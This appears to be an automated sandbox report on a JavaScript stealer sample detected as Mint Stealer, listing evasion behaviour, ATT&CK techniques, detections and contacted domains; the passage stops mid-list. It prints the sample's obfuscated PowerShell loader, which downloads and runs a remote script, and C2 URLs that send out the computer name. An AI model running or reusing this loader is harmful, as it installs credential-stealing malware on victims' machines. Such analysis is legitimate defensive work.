    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Queries memory information (via WMI often done to detect virtual machines)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9917Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5328Thread sleep count: 9917 > 30Jump to behavior
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2C2D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineh
    Source: powershell.exe, 00000003.00000002.79910993215.0000016D3A7BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2C2D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2A908000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79920045431.0000016D42BFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
    Source: powershell.exe, 00000003.00000002.79920045431.0000016D42BFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanIsVirtualMachine
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2C2D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
    Source: powershell.exe, 00000003.00000002.79920045431.0000016D42BCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Yara detected Mint Stealer
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1796, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected Mint Stealer
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1796, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information2
    Scripting    		Valid Accounts31
    Windows Management Instrumentation    		2
    Scripting    		11
    Process Injection    		11
    Virtualization/Sandbox Evasion    		OS Credential Dumping21
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts11
    Command and Scripting Interpreter    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		11
    Process Injection    		LSASS Memory11
    Virtualization/Sandbox Evasion    		Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Exploitation for Client Execution    		Logon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information    		Security Account Manager1
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts1
    PowerShell    		Login HookLogin Hook2
    Obfuscated Files or Information    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput Capture12
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA Secrets13
    System Information Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    _DRP12938938231_PDF.js16%ReversingLabsScript-JS.Trojan.MalDorado

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://0.google0%Avira URL Cloudsafe
    http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
    http://www.microsoft.w0%Avira URL Cloudsafe
    http://sfibhzu3ubhza.top/1.php?s=mints2180%Avira URL Cloudsafe
    https://0.google.com/0%Avira URL Cloudsafe
    http://$g31r4qoblma59n7/$ka2f95t10y7xcsp.php?id=$env:computername&key=$fdnjboswy&s=mints210%Avira URL Cloudsafe
    http://sfibhzu3ubhza.top/1.php?s=mints210%Avira URL Cloudsafe
    http://sfibhzu3ubhza.top0%Avira URL Cloudsafe
    https://apis.google.comh0%Avira URL Cloudsafe
    https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
    http://0.google.com/0%Avira URL Cloudsafe
    https://ion=v4.50%Avira URL Cloudsafe
    http://www.quovadis.bm00%Avira URL Cloudsafe
    http://0.google.0%Avira URL Cloudsafe
    http://gidcldeaccadneh.top100%Avira URL Cloudmalware
    http://pesterbdd.com/images/Pester.pngXz0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    sfibhzu3ubhza.top
    		206.188.196.25
    		truetrue
      		unknown
      www.google.com
      		74.125.136.106
      		truefalse
        		high
        gidcldeaccadneh.top
        		206.188.196.37
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://sfibhzu3ubhza.top/1.php?s=mints21true
          • Avira URL Cloud: safe
          		unknown
          http://www.google.com/false
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://www.google.com/intl/en/about/products?tab=whpowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000003.00000002.79881311037.0000016D2B323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A6CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A4C0000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://sfibhzu3ubhza.toppowershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://sfibhzu3ubhza.top/1.php?s=mints218powershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000003.00000002.79910993215.0000016D3A522000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://news.google.com/?tab=wnpowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://$g31r4qoblma59n7/$ka2f95t10y7xcsp.php?id=$env:computername&key=$fdnjboswy&s=mints21powershell.exe, 00000003.00000002.79881311037.0000016D2A908000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schema.org/WebPagepowershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C0B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C0BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C0A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A7BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2BF1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C0CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2BEFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A6CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C097000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2BF28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C0AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2BEF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2BF0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C0A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A4C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2BF22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 